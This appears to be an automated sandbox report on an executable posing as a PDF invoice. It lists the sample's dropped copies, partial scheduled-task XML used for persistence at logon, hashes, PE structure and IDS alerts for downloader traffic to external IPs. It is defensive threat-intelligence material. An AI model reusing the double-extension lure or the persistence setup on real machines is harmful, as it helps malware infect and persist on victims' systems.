                                                                                          Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          rSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          rRFQ-KTE-16102024.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          Ref 4437f1621b4d3c86c805c7d643da22620c938c1e.htmlGet hashmaliciousMamba2FABrowse
                                                                                          • 149.154.167.220
                                                                                          zapretka.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          baks-zapret.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice_21-1541 And Packing List.pdf.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vrhZELiHpiub.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2232
                                                                                          Entropy (8bit):5.379677338874509
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHxvIIwLgZ2KRHWLOug8s
                                                                                          MD5:0409BC4E22C202C47D580902DAA656F4
                                                                                          SHA1:FF4E4FD1293C724A149AE0A1128D7B02CEFAED17
                                                                                          SHA-256:028122B959E6E45EC84CE434E2266AC3296C0ADAB2A37C391E0DEDFCA1823206
                                                                                          SHA-512:6710C3E7F5822EB83F2C5228117076D73D4785AE7A7121733B5D248D9059BDDF920D750D44717B80D2E1B19E24EC276C9EFCF7DF840E3F8D73F0E1CA35C2E5E3
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iuqeumpe.43c.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5pskkbn.0h1.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlinndbh.thb.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5mbjna1.i3v.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\tmp5F82.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1578
                                                                                          Entropy (8bit):5.112884068473387
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtabxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTMv
                                                                                          MD5:B40A72CBABF5BB2D2283A3F09F4CE5FA
                                                                                          SHA1:747E66482E2FC966147DCB9C2E082C483DA1A408
                                                                                          SHA-256:A585E7EDB0D03AC4048DBBF1888A76FD90AD372A79A5D4FD926C4E09569E6A51
                                                                                          SHA-512:03044E41CAD15B3E1736806FE09F9D594113060820B0D0C21DA46D8463E11CB9AC5F4D65D532ECD208FFC31072EA39144DB334FACBA4BA5BA9CAE9447AA14BB1
                                                                                          Malicious:true
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                          C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1578
                                                                                          Entropy (8bit):5.112884068473387
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtabxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTMv
                                                                                          MD5:B40A72CBABF5BB2D2283A3F09F4CE5FA
                                                                                          SHA1:747E66482E2FC966147DCB9C2E082C483DA1A408
                                                                                          SHA-256:A585E7EDB0D03AC4048DBBF1888A76FD90AD372A79A5D4FD926C4E09569E6A51
                                                                                          SHA-512:03044E41CAD15B3E1736806FE09F9D594113060820B0D0C21DA46D8463E11CB9AC5F4D65D532ECD208FFC31072EA39144DB334FACBA4BA5BA9CAE9447AA14BB1
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                          C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):685568
                                                                                          Entropy (8bit):7.865383149265984
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:sTw4mLTyKugzOg26FAoIP8Idfhp/cmHl3uVXsW5BnX6Yft2zKL3wJdidN4Q:sT0L2MRJFALL9xzW63zK0JdidN
                                                                                          MD5:735A7DF205549792227DE19741161BF4
                                                                                          SHA1:EAF1A198D5D1B3FCB9F800D904FB77FCF292DD4F
                                                                                          SHA-256:8A48CE8DB35CC289949562CAE156FCE70A8E7F913B35515BCE4CDC2741152B8B
                                                                                          SHA-512:11F6C19323B3B6DA9A157588351C5ACC50AC1B0379CFF58434D6954080A6B98C1BFDC8E097DC5824D4172C69EDBCF2B0CC5461F3122C02A55FBE4A38A942733D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N................0..j............... ........@.. ....................................@.................................K...O.......L............................r..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc...L............l..............@..@.reloc...............t..............@..B........................H........<..(-......N....j..................................................~....o....~....o.......(;.....*...o?.....~.....(-....(/...o.....*....0..4..........(/....(5...X(0.....(/...........,... ....(0.....*..{....*"..}....*....(....~.....o-....o1....[X.o/....o3...X.(....(........(.....*....0../..............YE................+...+...+...+.+...+..*..0..1..............YE................+....+....+...+.+...+..*..{....*"..}....*.......o.....o........o9...(;.......}......(.....*

                                                                                          C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe:Zone.Identifier

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.865383149265984
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          File size:685'568 bytes
                                                                                          MD5:735a7df205549792227de19741161bf4
                                                                                          SHA1:eaf1a198d5d1b3fcb9f800d904fb77fcf292dd4f
                                                                                          SHA256:8a48ce8db35cc289949562cae156fce70a8e7f913b35515bce4cdc2741152b8b
                                                                                          SHA512:11f6c19323b3b6da9a157588351c5acc50ac1b0379cff58434d6954080a6b98c1bfdc8e097dc5824d4172c69edbcf2b0cc5461f3122c02a55fbe4a38a942733d
                                                                                          SSDEEP:12288:sTw4mLTyKugzOg26FAoIP8Idfhp/cmHl3uVXsW5BnX6Yft2zKL3wJdidN4Q:sT0L2MRJFALL9xzW63zK0JdidN
                                                                                          TLSH:1FE412F24799D93AE5E117B90632C3B645285E9EE561D303CEEE8CF3BA063C578442C9
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N................0..j............... ........@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:90cececece8e8eb0

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4a899e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0xB1944EA2 [Thu May 29 11:38:10 2064 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          push eax
                                                                                          add byte ptr [eax+eax+61h], ch
                                                                                          add byte ptr [esi+00h], ch
                                                                                          add byte ptr [edi+00h], al
                                                                                          popad
                                                                                          add byte ptr [ebp+00h], ch
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa894b0x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x64c.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa72800x70.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xa69bc0xa6a00105b745a7731b902314e1b27150417f4False0.9421989286384096data7.8740976110674445IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xaa0000x64c0x8001f108096a1abf4ce7045077443a90b9cFalse0.33837890625data3.493196069001366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xac0000xc0x20072a218fe9f9aa5bf69fc76ea0ce9af3eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0xaa0900x3bcdata0.40585774058577406
                                                                                          RT_MANIFEST0xaa45c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449752193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449747193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449756193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449774193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449746193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449751193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449765193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449775193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449757193.122.130.080TCP
                                                                                          2024-10-17T09:44:36.922055+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449758193.122.130.080TCP
                                                                                          2024-10-17T09:44:42.156482+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.130.080TCP
                                                                                          2024-10-17T09:44:43.468988+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.130.080TCP
                                                                                          2024-10-17T09:44:43.687732+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.130.080TCP
                                                                                          2024-10-17T09:44:44.393209+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.96.3443TCP
                                                                                          2024-10-17T09:44:45.160535+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748193.122.130.080TCP
                                                                                          2024-10-17T09:44:45.872270+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449749188.114.96.3443TCP
                                                                                          2024-10-17T09:44:46.062835+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449750193.122.130.080TCP
